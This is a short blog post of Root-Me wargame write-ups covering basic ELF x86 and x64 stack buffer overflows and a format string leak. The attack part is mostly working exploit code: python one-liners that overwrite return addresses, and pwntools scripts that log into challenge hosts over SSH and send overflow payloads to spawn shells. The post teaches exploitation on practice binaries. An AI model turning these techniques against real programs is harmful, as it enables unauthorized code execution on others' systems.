root-me-app-system

2018/10/11

ELF x86 - Stack buffer overflow basic 1

Step through it in gdb to get familiar with how gdb is used.

payload:

(python -c 'print "a"*40+"DEADBEEF".decode("hex")[::-1]';cat) | ./ch13

Without the `;cat`, the shell exits immediately, because system('/bin/dash') reads EOF from stdin; keeping cat attached holds the input stream open.

ELF x86 - Stack buffer overflow basic 2

In gdb, `i functions` followed by `p shell` shows the address of the shell function.

exp.py:

from pwn import *

# SSH into the challenge host and start the target binary there
socket=ssh(host='challenge02.root-me.org',user='app-systeme-ch15',password='app-systeme-ch15',port=2222)

io=socket.process('./ch15')
#elf=ELF('./ch15')

shell_addr=0x08048464  # address of shell(), taken from `p shell` in gdb

# padding up to the saved return address (offsets taken from gdb), then the address of shell()
payload='a'*(0x8c-0xc)+p32(shell_addr)
io.sendline(payload)
io.interactive()

ELF x86 - Format string bug basic 1

payload:

./ch5 %08p,%08p,%08p,%08p,%08p,%08p,%08p,%08p,%08p,%08p,%08p,%08p,%08p,%08p

Decode the stack contents that were leaked:

s=[...]  # the %08p values leaked from the stack, as hex strings
for i in s:
    try:
        print i.decode('hex')[::-1]  # hex -> bytes, reversed because the stack is little-endian
    except:
        pass  # skip values that are not valid hex

ELF x64 - Stack buffer overflow - basic

exp.py:

from pwn import *

# SSH into the challenge host and start the target binary there
socket=ssh(host='challenge03.root-me.org',user='app-systeme-ch35',password='app-systeme-ch35',port=2223)
io=socket.process('./ch35')
# 0x118 bytes of padding up to the saved return address, then 0x4005e7 as a little-endian 64-bit address
payload="a"*0x118+"\xe7\x05\x40\x00\x00\x00\x00\x00"
io.sendline(payload)
io.interactive()

Author: n3k0

Published: October 11th 2018, 10:37:04

Shout: I'm dying without 魔夜2 to play.
